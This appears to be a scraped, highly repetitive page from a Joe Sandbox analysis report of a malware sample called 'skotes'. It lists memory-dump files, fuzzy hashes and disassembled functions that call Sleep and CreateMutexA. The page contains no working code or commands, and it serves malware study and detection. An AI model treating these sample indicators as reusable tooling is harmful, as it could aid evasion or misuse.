Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 4a1363a35b16c28fd29acbe935d81cc564ea6fd12d262c893d6259fbc9a3d4bf
Instruction ID: 47d55db62c98c1df1fd1187de9005645820c15f5691100fe6c5447e730e6f6da
Opcode Fuzzy Hash: 4a1363a35b16c28fd29acbe935d81cc564ea6fd12d262c893d6259fbc9a3d4bf
Instruction Fuzzy Hash: B4315D71B042059BEB08EB7DDDC5BEDBB62EBC1320F208259E114DB3D6C7795980AB51

Function 00FB9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 97eba7e4076fa4f73d5a70c56a4dc419c786f5eace8acd7eca5c23fe35e51d1c
Instruction ID: dc14daecf436372ff6deb5400cae9fcb44e275a36daa7a9b2239257016f5df02
Opcode Fuzzy Hash: 97eba7e4076fa4f73d5a70c56a4dc419c786f5eace8acd7eca5c23fe35e51d1c
Instruction Fuzzy Hash: 2E314A31B042049BFB18AB7DDC85BEDB762EF85320F20861DE114DB2D5D77A9980AB52

Function 00FBA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 103598017c7acd4713b62cdce3301046e605f3c5a4075e4136559a684cf9cf65
Instruction ID: 1e16e1ae1508878195a3c436e6c988c445cd8b184412c9cd5955886d0ee20fda
Opcode Fuzzy Hash: 103598017c7acd4713b62cdce3301046e605f3c5a4075e4136559a684cf9cf65
Instruction Fuzzy Hash: 21312631B001009BFB18EB7DCD85BEDB762EB81324F208219E024DB2D5D73A9980AF12

Function 00FBA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 1ab8b1ece29002e3a245226b5383ceefc34095d811bfd611b3122c38aa9d8acb
Instruction ID: ddaf6032dcd16d9022e2492de042c7d18dad9176803992e8680c1f2061dba65b
Opcode Fuzzy Hash: 1ab8b1ece29002e3a245226b5383ceefc34095d811bfd611b3122c38aa9d8acb
Instruction Fuzzy Hash: 16314A31B001009BFB08AB7DDDC9BDDB762AFC5320F204259E014DB2D5D73A9980AF12

Function 00FBA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135093170.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135121752.00000000011E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135151416.0000000001201000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135175194.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135197946.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135219761.000000000120D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135241305.000000000120E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135263120.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135289439.000000000121D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135313680.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135334110.000000000121F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135354988.0000000001221000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135391376.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135434782.000000000122E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135460168.000000000122F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135484161.0000000001233000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135506530.0000000001234000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135528898.000000000123A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135551707.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135573278.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135620544.000000000124F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135649407.0000000001268000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.0000000001269000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135673908.000000000128C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135797821.00000000012B9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135823880.00000000012BA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135855581.00000000012BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135886291.00000000012C1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135924836.00000000012D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135953206.00000000012D1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ab7f38452940b47ec7f923c286e3ba23ca999d2dd8538d2c7d35e5de94d135e5
Instruction ID: 1272371a2240a67bc5b5b42a922ad901a08267c9f2d2ba5e424bcf28e0e11adb
Opcode Fuzzy Hash: ab7f38452940b47ec7f923c286e3ba23ca999d2dd8538d2c7d35e5de94d135e5
Instruction Fuzzy Hash: C1314A31A00104DBEB18EB7DDDC9BEDB761EF91324F204219E014DB2D6D77A5980AB52

Function 00FBA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00FBA963
CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981

Memory Dump Source

Source File: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000003.00000002.2134472755.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134494920.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134570681.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134591184.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134616107.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134641725.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134664275.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134796588.000000000117C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134819402.000000000117E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.0000000001196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134891398.00000000011A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134932829.00000000011AA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134955924.00000000011AB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2134977978.00000000011AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135000432.00000000011B8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135022080.00000000011BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135049071.00000000011CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2135071621.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
